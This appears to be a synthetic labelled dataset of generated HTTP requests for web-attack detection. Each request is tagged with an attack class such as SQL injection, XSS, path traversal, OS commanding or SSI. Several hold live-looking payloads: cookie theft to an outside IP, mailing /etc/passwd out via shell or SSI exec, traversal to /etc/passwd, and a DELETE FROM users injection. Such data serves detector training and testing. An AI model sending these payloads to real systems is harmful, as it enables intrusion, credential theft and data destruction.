End - Id: 35820
Start - Id: 49438
class: XPathInjection
GET /iZ-tPLA8/oDx3X3pxu/EoUz.s1/eAr/snhsiqgoEotnE/ocuNF0h3uFhfGs/8swp-/e0msl.jpeg?oojinhiYw9eio6=16+or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++49521%3D HTTP/1.1
Host: 204.122.96.13
Connection: byhd
Accept: application/zip
Accept-Charset: iso-10646-ucs-2;q=0.1, euc-tw, x-mac-icelandic;q=0.0, x-mac-chinesesimp;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=36
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="23"
Date: Thu, 02 Oct 08 10:46:39 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: ahceh5y=Ebeurdoc;a1t9sftt
From: poiter@eorm.biz
If-Modified-Since: Tue, 28 Mar 06 19:33:43 UTC
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: "rpE4w66fU62dXkb21"
If-None-Match: "UW_u@HH5e@YUSHFS"
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZXJSbWlwaDlobnJvemNhOWhlMHl0M3RjdHR5UGl1czh4
Authorization: ei93ee ontr=ia8Itr1b
Range: 60-32,32547-,55039-
Referer: /ieswr/stkpl/vte1n/eyeee.aspx
TE: trailers
Trailer: User-Agent
User-Agent: mfu9o/5.8.9.7
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: HTTP/1.8 www.2mmFn.jpeg:9, 5.0 146.22.117.224:80
Transfer-Encoding: gzip
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 727 www.0daudryu.htm "hsLesemehtnrtasserx6" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49438
Start - Id: 37896
class: LdapInjection
GET /hx-MW/oaqr/eBgKgn3g9bpz@/ohtoht6reuier8/tjMnK/eKvkwy..VW/y8ithn/ilimh1tbydaguuohn/nmonreinui0.shtml?N3otnnhtrtatibd=EXm2en&tdeiehoj=hfXC1&reBtdl94n=i84&zJ4thwNKNtperl_=ilink%40cmdewinnt&PIsa=veR%29%28%26%28objectClass%3Dnd*%29&zosc3Tzsras=FJa&OJkhbOhBltClib=7491&5YjmetaTBRE@T=nvqurCt8eniqukBeo&ncbodyaMGGOeGexecaccess_logexec=aNvitong%3Alds&Mi9jsVc7Mw=winnttEls&nogiieTaeEtcehr=agadmin9e6qc%5D&eew=access_log4+openz%2BJscriptar&rmvhE0deeh=3 HTTP/1.0
Host: www.tzoowHa.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: G-n;q=0.7, axdpe-eGleaoes;q=0.3, natld-teg1euon, eilshle-r9fxholy
Cache-Control: no-transform
Client-ip: 176.10.100.235
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="1"
Date: Mon, 26 Apr 10 16:51:41 GMT
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sat, 28 Feb 04 01:30:30 GMT
If-Unmodified-Since: Fri, 04 Feb 05 14:47:05 UTC
If-Match: *
If-None-Match: *
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -375,281-
Referer: /nahcvl/rhhasa/ano4en/gisAr.jpeg
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: woerafd (spqU9wwBhr; xJFBtj)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 4.1 www.9len.shtml:058, 6.7 121.38.160.197
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 960 www.tzoEs.tiff "dlespebn" "Wed, 09 Aug 06 04:59:18 CET"
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37896
Start - Id: 48238
class: XSS
POST /5hlo/iTtb0eneogoflGnt9sq/n1shVDf@38pds6ya/metp5wcudsTTg/aerobxaTeidteeasjrdj/qac1cmhrltndadu7qi/sVRkDautoexecOvbQ-Z/3k9FaGDnyjHOIh_.asp? HTTP/1.0
Content-Length: 124
Content-Language: eaflducn,tut
Content-Encoding: compress
Content-Location: /ntdNe/sWHh/nshtsL/m57ef/y4eo3to.jpg
Content-MD5: eG5pb29vbWd6ZXJTZW5jcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:22:53 GMT
Last-Modified: Thu, 01 Jul 04 17:58:53 CET
Host: www.9stu.org
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.3, x-mac-ce, windows-1255;q=0.5
Accept-Encoding: gzip, deflate;q=0.1, deflate, gzip;q=0.5, deflate
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 64.5.122.208
Cookie: Qxterm1cm2W=419368;ehn=A1eOittIaidOstOD;1netcatACnT3bK0=&{[window.open('http://42.40.205.152/tone.jsp'+document.cookie);]};
Cookie2: $Version="6"
Date: Sat, 21 Jul 07 07:54:59 GMT
ETag: W/"9l_l0k7g9Eq262WkJrA"
Expect: 100-continue
From: oowkt3et@ea9hioiot.be
If-Modified-Since: Mon, 21 Feb 05 10:59:36 CET
If-Unmodified-Since: Sun, 29 Jun 08 10:46:29 UTC
If-Match: *
If-None-Match: *
If-Range: "BP6M_1t8nqfzRXxHQ3"
Max-Forwards: 105
MIME-Version: 4.5
Pragma: ievfa='t2itha0'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Uoacy poifstne=37te
Range: -594,-4310,59019-33
Referer: /8ue5h3mf/SM8zmi/re8e6Eu.rar
TE: trailers,trailers
Trailer: Via
User-Agent: OyeoHeY/4.7
UA-CPU: StrongARM
UA-Disp: 0382,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 582x431
Via: FTP/5.1 www.anirn.js, 1.0 www.et17nsto.jpeg, FTP/6.9 www.nn3d.css
Transfer-Encoding: identity
Upgrade: dig/2.3, akvtp/8.0, t6wce/4.8, nrtn/1.1
Warning: 321 244.248.253.181 "iesqnoutyAsh" "Fri, 04 Feb 05 13:45:57 CET"
X-Serial-Number: 793433345048
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wtExIoota=66&SXd4McmzhqMin=tGJiBwiJ&php25EMHdJWh=jenwni3ddae&m.QO=491265&g.f_7AaCtCzK=ltnihiool&ncnetcatPBH=heslro9kt1fLnnin

End - Id: 48238
Start - Id: 35267
class: SqlInjection
GET /aXziiayzB@/dreaii/nuUN6N/H6hfDvxboot.iniBscmdAhUa/ren/r7H52ma/rmtog90smv.asmx?z6jBjt=%2Ffcnsystemetc%3DOfnhomehnh%24nMd&6L2ptaytM5ifebt=0qJFl&p9wHRYuPiwinnt=i98roAe0+shutdownest&rtItEsxt=OR+++++%27Qysrnr8%27+++%3D+N%27+%27&lhsnodsna=cnx2%2BwUg&rnetvs=kz1%2F&w1=559&a1owTsit=bobjectgEeg%3Baeenyi&Gwy1v=e&BneNo3=12&re5Tdchimyreeee=oV2-X0EA.%40&utue=be0eo8c+bof4%25vpassthru&nenhld=sedeigm88iu%2Bh%25tjeftp4&tbn2or=uscriptireelog%269ssystemA3hiutf HTTP/1.0
Host: www.seyeaiqnrt.st
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: earodtp-Ansx2u;q=0.9, lzddR6il-tad1e;q=0.8, EnpiilXi-tbuyeu;q=0.1
Cache-Control: no-store
Client-ip: 155.132.155.102
Cookie: tsf=iamlaoedatelm5o4o;_servicesyF0jRuu5=dcd9w5wya;etrSitGisNnssp=nhtpass;zf;i3Jidhtdn=eb0rMG4R3r;iCncK0YU3g0=ro+
Cookie2: $Version="87"
Date: Tue, 26 Oct 04 12:19:32 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: meahwq=liroah;ooftt
From: lpter@0feo.uk
If-Modified-Since: Wed, 13 Jan 10 14:17:18 UTC
If-Unmodified-Since: Tue, 23 Mar 10 10:17:28 CET
If-Match: "7P@x6FA23l02sbho"
If-None-Match: "c90T98RmLi.gKqPtLF@x"
If-Range: Wed, 01 Sep 04 10:12:36 UTC
Max-Forwards: 5255
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest nc=5dA9257d
Authorization: Digest realm
Range: 930-456,2355-
Referer: http://www.mqit.it/rRarmge/onnh9.tar
TE: trailers
Trailer: Proxy-Authorization
User-Agent: egiVNw@o4i http://www.a5gEI.org
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/0.4 104.19.69.111
Transfer-Encoding: compress
Upgrade: o9e/7.6, Srr/2.4, rwihen/5.2, raoelr/6.2
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35267
Start - Id: 45353
class: PathTransversal
PUT /t1Its@PzrYo5bvy/iotyrmwqw4twatHpwd7T/6ojalh1/axtitt/connect0WP/fbcuro.jpg? HTTP/1.1
Content-Length: 256
Content-Language: ijt
Content-Encoding: compress
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: aDFsbnJ0ZXRxdGRucmhFZQ==
Content-Type: application/x-www-form-urlencoded
Host: www.i6s4t.de
Connection: close
Accept: text/*;q=0.1
Accept-Charset: windows-1250, iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=96848
Client-ip: 66.195.135.123
Cookie2: $Version="3"
Date: Wed, 24 Jun 09 13:21:15 UTC
ETag: "s2pefc_1WGvDRXu.vkU"
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Match: "xBQxH0xH7c28uaUD"
If-Range: Tue, 24 Jul 07 14:23:05 GMT
Max-Forwards: 489
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: http://www.tennerv.net/nsjur/ifae/rrNoo.rar
User-Agent: Mozilla/5.7 (compatible; Konqueror/6.9; Open BSD i586; vtnsro8i)
Transfer-Encoding: compress
----: ----------------------

1n6L=4rlbtnrstdinnhtaccesiframerandZEehita&hdeor=593063&PNXAq-6evalL=pmorm9UxpACe&mTnO6s1p=49A1YRHm&gr9EDn=0865&oar8hpHo=147&bl23Tsasrvttl=9o&KEaNN8=lCkNO@VeIs&z6.COWirmXScB=seitKe&xro=\autoexec.bat&tegrxepieadL=78389746&nsu=bre&L9window.openbbbody=174

End - Id: 45353
Start - Id: 43224
class: OsCommanding
GET /yrxyvNkM/n023V9L/s9YS@_/usloa3wmohcmNI/zaexneewrAtgrse5aC/DU7window.open-_5yAflXiCj/em@lqIYDBJ2@CE7hOKA./zV/sI2Dvgpm5gFN/aktjap6.js?kgdi=82639364&p9OX=nut%3F8rZLrk&qbes=5b9ag3lri&rw5ra9bjUaep1d=ia&rhs1eLM7=%5C%3B++%5C%2Fbin%5C%2Fid++%3B HTTP/1.0
Host: www.1soktsrlDs.de:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="4"
Date: Fri, 30 Jan 04 15:15:09 UTC
ETag: "kdVzSjRw_Ku0k.MV_7"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Mon, 18 Apr 05 11:41:38 GMT
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "OolKYqDtSp3SWyIfo"
If-None-Match: "nJiQc9e3l.pu9.nx9"
If-Range: "v0xW65RH93jR4xe1.zPw"
Max-Forwards: 08
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="holleo"
Authorization: Pofq tqty7=7ebloswn
Range: 54119-349098
Referer: /vefiaso8/lY2mst/Et84oSba/kefc2bnn.bin
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 0.4; DO-oa; rv:4.8.7) Gecko/63780733
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 476x125
Via: HTTP/0.8 7.114.147.168:60733
Transfer-Encoding: deflate
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 267 162.229.85.193 "f31ieco2yiembfnit" "Sun, 26 Nov 06 21:03:12 GMT"
X-Forwarded-For: 240.202.139.239
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43224
Start - Id: 40465
class: SSI
GET /3TGybgsoundPZpLi5JT6E/qip-hDeqdlnEfO./ogIC@KitSPr3yJfm/f1ivaehrgarB4P.msf?roegohll=%3C%21--++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&aae=908864&aadmfain=ie&InodeHU@DOi=83290843 HTTP/1.0
Host: www.rd6miHel.org
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.9, ks_c_5601-1987;q=0.7, x-mac-korean;q=0.7
Accept-Encoding: 
Accept-Language: snihro-cbeai;q=0.1, npt8-3riD;q=0.0, aih7num-trr;q=0.2, hrr-0es0ioi;q=0.8
Cache-Control: no-cache
Client-ip: 166.89.179.136
Cookie: ar=er
Cookie2: $Version="35"
Date: Fri, 05 Jun 09 01:44:12 GMT
ETag: W/"CWkiioo0WdACHhp"
Expect: gacnoeoo
From: npmo@pBctcq.com
If-Modified-Since: Mon, 07 Apr 08 19:17:43 CET
If-Unmodified-Since: Sat, 29 Aug 09 19:55:45 UTC
If-Match: "2OsZPeaqiftqI@s"
If-None-Match: *
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 9
MIME-Version: 4.8
Pragma: sa0ere=87tEaF
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest nc=9F10e1e0
Range: 6740-758,0802-
Referer: http://AoAIw.cz/uits.tar
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: Mozilla/1.2 (Windows; U; WinNT 1.6; 2r-e2; rv:4.9.6) Gecko/63804824
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: pwuF/2.7 www.y9aiaws.tiff
Transfer-Encoding: identity
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 197.226.53.190
X-Serial-Number: 98565372421828
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40465
Start - Id: 43447
class: OsCommanding
GET /SkmSLNdetc8W/rKizBm/.nxQl/iild/l7f_0vg/rdLqWsv_-g0/twtiaratabtnT/lh/guT/r0y0_MCH8I-prA/93FmcHQVUbh9_h65p.js?naSisd7ai=30180&lhksene4hmfToio=anUx_4&--PMo5A=-ea&duyHtvGetnche=8296348&t7ardoiIOtc=2&tenfrstdf=oops++++%3B++cat++++%2Fetc%2Fpasswd+++++%7C++++mail+your%409llr.com&Omttr=t%40DTJZDQq&aeyuAnuslLoeF=hVe&htoi5iy=eWM6Q2JfY&raykye=eu3 HTTP/1.0
Host: www.onaas.cz:562
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 107.215.79.167
Cookie: j14R=xml:setef1iahT0(;emaeod5rtos=ldmRgN@f;b2vasieoeh=mrcBnHE1Lbv;etIlrxaot9rdUu=0;b3l@bwhereform8HGTa=rRzvk0;t0stSteEe=catap4i
Cookie2: $Version="05"
Date: Wed, 18 Jun 08 11:35:28 GMT
ETag: "UWj2c5HfBtFSJ6LTOYlT"
Expect: 100-continue
From: Etwo@t45aetl.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Thu, 08 Oct 09 11:56:33 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Oct 07 14:49:18 CET
Max-Forwards: 040
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: /teeo/lstsia/5jszjp6.css
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: al1VLy http://www.eiti7t7.net
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: FTP/7.9 215.224.55.6, dixto/0.6 www.Bwmifap.gif, 2.2 19.175.122.249
Transfer-Encoding: gzip
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 209.66.111.141
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43447
Start - Id: 40960
class: SSI
PUT /srb4DF1ZhZthtToM/i.FF3yEHMkdt/sVlp-IILz0boJ/bniygR/LXJ4/nui.gJ2Gd/suJ2ObgjMNuUmuulI/6EpUgzonbtphpO/eho1swsdhdDmhidksN/djAkcut9HMkQC@P/P1fimef.js? HTTP/1.1
Content-Length: 190
Content-Language: m,m6te5h
Content-Encoding: gzip
Content-Location: /fl3hnto/lehtmaes.msf
Content-MD5: Y2VjZHNvcjFlZTdjc0xSdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Apr 10 07:48:07 CET
Last-Modified: Thu, 29 Sep 05 04:05:31 GMT
Host: 78.27.197.234
Connection: close
Accept: */*
Accept-Charset: *
Accept-Language: cdn1v75-lneiinla, ontcEr-lonjsm4m;q=0.8, celtm5th-t;q=0.9
Cookie: 7XeT0Bv=ceer;tPeourtrom=Aib;loit=<!--#odbc     statement    =   "select elrr, 5a7a4,  eitJ    from mb92rm8 order    by    2,  09,  1"     -->;mevhyOh=aI-Ci;dttfuoim=to=e7w3o+a/d
Date: Thu, 20 Oct 05 06:50:56 CET
ETag: "C90IZJQOjdH_veZ2H"
If-Modified-Since: Mon, 17 Sep 07 12:34:55 GMT
If-Unmodified-Since: Mon, 27 Sep 04 11:46:51 CET
If-None-Match: "DqS4zIBdxqcajgP7B"
Referer: http://www.tMas.uk/tYdt/7rhtrjai/thnvsdr3/ihoc/rmce.txt
User-Agent: nDydijtet/2.0.6.4
UA-CPU: 68000
X-Forwarded-For: 206.211.27.75

Ebyhhxhh=0064&a7f=icyX&wklFPVLn=9&5s3khrNrNn=uj?uo&9t=dit2o4o5&iklsmiSegeime=oItnetcat%hejo+e6e&ZyG4QeOhC1te=yd5zq4o&W9oM7-3http6style=448079&it=1&res2ltueslnato=Su1qtomeix9yA&re=I3lhh

End - Id: 40960
Start - Id: 39897
class: SSI
GET /jG-CVBNFbwp-group by4W/2warEwiiEjtaenma9.mspx? HTTP/1.1
Host: 232.52.188.230
Connection: close
Accept: image/jpeg;q=0.3, audio/x-wav, image/jpeg;q=0.6
Accept-Charset: x-mac-japanese, x-mac-roman;q=0.1, iso-8859-6, koi8;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 141.68.193.206
Cookie: oBna9=o5irsstylera3ase;EannnaUeoeiw=65368618;gresaouunrd6=lials;dYGuxp_K0H=\er6s:ubanu?iz;s@H1B_=<!-- #exec   cmd="/bin/mail  1sN5gajftt.com     <   /etc/passwd"-->
Cookie2: $Version="9"
Date: Wed, 07 Sep 05 21:59:21 UTC
ETag: W/"fo2P67-wmg2HeQWFr"
If-Modified-Since: Tue, 25 Dec 07 17:40:29 CET
If-Unmodified-Since: Mon, 11 Feb 08 17:17:42 UTC
If-Match: "vwFCFuOshUMocSM7"
If-None-Match: "m.AuPxGoqqPFDz.u"
If-Range: Tue, 28 Nov 06 17:12:58 UTC
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: Basic d2VhZXk6czVocWRPaA==
Authorization: Basic cmVTczplbWpzTA==
Referer: http://www.ryzt.gov/ps4njt/us1ners4.php
TE: gzip,trailers
User-Agent: itfagncdq/6.8
UA-OS: Solaris
Via: 9.1 www.egaen.tiff, FTP/8.5 www.s7tIVs.gif:2154
Transfer-Encoding: pbew
Upgrade: 6xY99/6.6, Cho/2.5, Ahw1G/3.8, teq/5.9
----: --------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39897
Start - Id: 35879
class: XPathInjection
GET /e09/9hs0/aqRVH/etyo/anoarperafmti7odXg/jZm@ySH612iNJv/9Lzr8wCv/6xY22XhBrT5aYv.cfm?aee=or%2F9ppe%2Fasw2%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D29%5D+++++or++%27ls%27+%3D+%27&eaohcg=rt3iersrq HTTP/1.0
Host: www.e3Lt.it
Connection: keep-alive
Accept: image/jpeg, image/*;q=0.6, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mz6-o;q=0.8, svEsu8-1Iledu, uonsOi7-ofldan;q=0.9, sqxtulu-nomar;q=0.0
Cache-Control: no-cache
Client-ip: 31.139.167.30
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="19"
Date: Tue, 23 Jan 07 02:16:01 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Fri, 30 Dec 05 23:01:07 GMT
If-Unmodified-Since: Fri, 07 Mar 08 01:27:04 GMT
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "dH-d6UL5WEj7oTz"
If-Range: "-zXZiqQ6LdgXaoZX-V"
Max-Forwards: 005
MIME-Version: 4.5
Pragma: snekhek='neSn2'
Proxy-Authorization: Digest nonce
Authorization: fnr1a evaef=tkiEpein
Range: 3-18807,30473-219,305975-44534
Referer: http://www.nErO.fr/rtedao/ehmhi.wmn
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.1 (compatible; Konqueror/6.3; Win98; y1or; iminerie; osrwdb)
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: FTP/3.5 239.31.104.210
Transfer-Encoding: identity
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35879
Start - Id: 42162
class: SqlInjection
GET /hh/c0ohttr/tentzE/el9sc9/6s6eL9mAluamal8htaap/XrckFld9cUoptOn/ctIseatb4nw6bnisb8dn/iegh/u_0XnwC.sz3_P2z/q7oE5ie6t1iujcewmse/eYfLoYN@jewmw/s6IU44agqsGm.bin?8ae8s=Hd+0%2Btj%28e5eesprocessing-instruction&osup7xafh=isze&tufCeairiaeyedi=r6s92T2na%27++%29%3BDELETEFROMusersWHEREupper%28username%29+%3D++++upper%28++++%27admin&ccgnifnn=e82Oi7FlO&I1wn1ie=+1hteeUb6&ndtsEgk=9t0metu&n3l9mrsxht=uveNska1fy&naEen=op4aTbcyt HTTP/1.1
Host: 251.151.99.126:80
Connection: ihyeki
Accept: image/*;q=0.7, image/*, video/quicktime
Accept-Charset: shift_jis;q=0.9, iso-2022-kr;q=0.2, windows-1254, x-mac-japanese, x-mac-chinesesimp
Accept-Encoding: identity, gzip, deflate;q=0.6, gzip;q=0.4, compress;q=0.5
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 45.250.133.235
Cookie: ebs8ftH7nae=u8V1H1GBhKk;nlpnnroormide=hc8kaeppntmpdiowindow.opennLrs;I0Auch8otsqfe4i=rsopt:;qtbdmRteos72l=mailn;lh4ers=iEiPM2_b2FR;ltlas1v=iysw trechoiottea4go
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: rrtt8nk0
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 16 Jun 09 16:27:33 CET
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: "-_nwA0BgoQ7nevSKe"
If-Range: Sun, 05 Jul 09 21:38:34 GMT
Max-Forwards: 54
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic QW5oYmlwcmw6TmkzM2x2
Range: -65233,-6365
Referer: http://www.8anwaro.com/2Rec7her/oernt/mknzeqn/wTrahets/onSeuhOo.exe
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/8.8 (compatible; dUra0j; Open BSD i586; oxzhi; onwssolsv)
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/2.3 135.248.50.115
Transfer-Encoding: deflate
Upgrade: ntt4/1.6, tenmqn/4.1, ette/9.5, 9r8/6.4, s4RT/0.2
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42162
Start - Id: 38669
class: LdapInjection
GET /httpi/zFNsi/xsckbarlteaeg/mHEl@Y/ylAcopy2/i-Z@EIR-2HdG-nS.shtml?O3Wbj=oremmnlnTt&uCeb5r=%29+%28%7C++%28RtoaA%3D2m*%29&@e98ic=%28ts7perl+nll&tddhacct=wjaLJV7 HTTP/1.0
Host: www.erLdso.fr
Connection: rlwrh
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 202.109.50.24
Cookie: z3yetcu7RyC=chterh>k;EmholsdI9be=dwU;mh=992;x9=surlaerlotlealejoT;gicnb=31391848
Cookie2: $Version="3"
Date: Sat, 23 Feb 08 06:56:40 CET
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sat, 07 Nov 09 18:36:44 CET
If-Unmodified-Since: Thu, 13 Jul 06 21:00:21 GMT
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: *
If-Range: Tue, 11 Apr 06 07:51:37 UTC
Max-Forwards: 3443
MIME-Version: 9.7
Pragma: ag=tpgaph
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: -3789,-5,300-00360
Referer: /unsmI/SoaLfIi/luoetor.jpg
TE: gzip;q=0.7,trailers
Trailer: Accept
User-Agent: jormrehw9rhro
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 198 210.170.229.105 "HreisPeNtrsDzoqe7" "Mon, 01 Jun 09 16:10:48 CET"
----: -------------------

null

End - Id: 38669
Start - Id: 46279
class: PathTransversal
GET /ntuQQn6b/cci1IBf19p/yEnrRypQdlHWat6/Ntpstor/l@qy/eaw79wRiWawXFtuaZU/4eXfKoB/lwqLkj/oaQLF/lVhH7nNl.rNFih/eMnrN5aMc/r2tiEttdhNdu.jpeg?areE5sfeaito=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&oBFUoSQ_U=ErAcntp2atgaesafx&oiti1fu=5210915&Esaestui6ott=42&hls9wlawgaehua=00&zrooon9atc=88 HTTP/1.1
Host: www.hdnmr.net:2059
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1252;q=0.3, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 131.126.28.0
Cookie: yhh3aUab7et4eo=@updateis1z;eahcr5muhlmi=233
Cookie2: $Version="92"
